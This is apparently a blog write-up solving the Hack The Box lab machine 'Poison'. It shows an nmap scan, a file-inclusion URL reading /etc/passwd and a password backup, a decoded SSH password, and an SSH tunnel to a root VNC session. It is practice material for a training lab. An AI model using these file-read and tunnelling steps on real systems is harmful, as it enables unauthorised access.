Poison – Hackthebox.eu

Great box over at hackthebox.eu, which learned me a nifty new trick. Lets get started!

Enumeration

As always, we start with a full nmap scan:

sudo nmap -sV -sC -oA initial -p- 10.10.10.84

Nmap scan report for 10.10.10.84
Host is up (0.038s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 413.45 seconds

So we have port 80 running a HTTP service and port 22 running SSH.

Browsing to webpage displays the following:

We can run the following commands: Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

info.php reveals the following:

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:

Array ( [0] =. [1]; .. [2]; browse.php [3]; index.php; info.php; ini.php; listfiles.php; phpinfo.php; pwdbackup.txt )

That sounds like an interesting file. First lets see what happens when we change the parameter after the file= part:

http://10.10.10.84/browse.php?file=/etc/passwd

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr

$ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root:

daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and

Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin

kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games

pseudo-user:/:/usr/sbin/nologin news:*:8:8:News

Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man

Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell

Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission

User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail

Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind

Sandbox:/:/usr/sbin/nologin unbound:*:59:59:Unbound DNS

Resolver:/var/unbound:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-

user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep

user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp

programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-

user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post

Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:*:78:77:Auditdistd

unprivileged user:/var/empty:/usr/sbin/nologin www:*:80:80:World Wide Web

Owner:/nonexistent:/usr/sbin/nologin _ypldap:*:160:160:YP LDAP unprivileged

user:/var/empty:/usr/sbin/nologin hast:*:845:845:HAST unprivileged

user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged

user:/nonexistent:/usr/sbin/nologin _tss:*:601:601:TrouSerS

user:/var/empty:/usr/sbin/nologin messagebus:*:556:556:D-BUS Daemon

User:/nonexistent:/usr/sbin/nologin avahi:*:558:558:Avahi Daemon

User:/nonexistent:/usr/sbin/nologin cups:*:193:193:Cups

Owner:/nonexistent:/usr/sbin/nologin

charix:*:1001:1001:charix:/home/charix:/bin/csh

So our user is probably charix.

Lets see what is in that pwdbackup.txt file by using: http://10.10.10.84/browse.php?file=pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

Looking at the way the key was constructed, it looks like a base64 encoded key. The hint points us to that it is probably encoded 13 times. I’ve used the Cyberchef from GCHQ to decrypt the thing. It gives us the following key

Charix!2#4%6&8(0

The only service we’ve seen so far is the SSH service.

Exploitation

ssh 10.10.10.84 -l charix

Password: Charix!2#4%6&8(0

And we’re logged in.

Privilege Escalation

After running LinEnum, I noticed that a VNC service is running as root. To further explore this. Running LinEnum, I see that root is running VNC on 5901 and 5801, as well as sshd (which I already used to get access to the box). So, I probably need to setup a SSH tunnel to this machine and use VNC viewer to get access to the VNC-sessions on the Poisoin host.

I do the following:

[email protected]:~ % sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS 
www httpd 713 3 tcp6 *:80 *:*
www httpd 713 4 tcp4 *:80 *:*
www httpd 712 3 tcp6 *:80 *:*
www httpd 712 4 tcp4 *:80 *:*
www httpd 711 3 tcp6 *:80 *:*
www httpd 711 4 tcp4 *:80 *:*
root sendmail 642 3 tcp4 127.0.0.1:25 *:*
www httpd 641 3 tcp6 *:80 *:*
www httpd 641 4 tcp4 *:80 *:*
www httpd 640 3 tcp6 *:80 *:*
www httpd 640 4 tcp4 *:80 *:*
www httpd 639 3 tcp6 *:80 *:*
www httpd 639 4 tcp4 *:80 *:*
www httpd 638 3 tcp6 *:80 *:*
www httpd 638 4 tcp4 *:80 *:*
www httpd 637 3 tcp6 *:80 *:*
www httpd 637 4 tcp4 *:80 *:*
root httpd 625 3 tcp6 *:80 *:*
root httpd 625 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe


I used  http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html  and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ for research.

There is also a secret.zip file on the machine. Let’s start by setting up a tunnel:

ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84

 

Using vncviewer, we can get access to the desktop of the root user, which contains the key:

vncviewer -passwd secret
Use localhost:5901 to get access.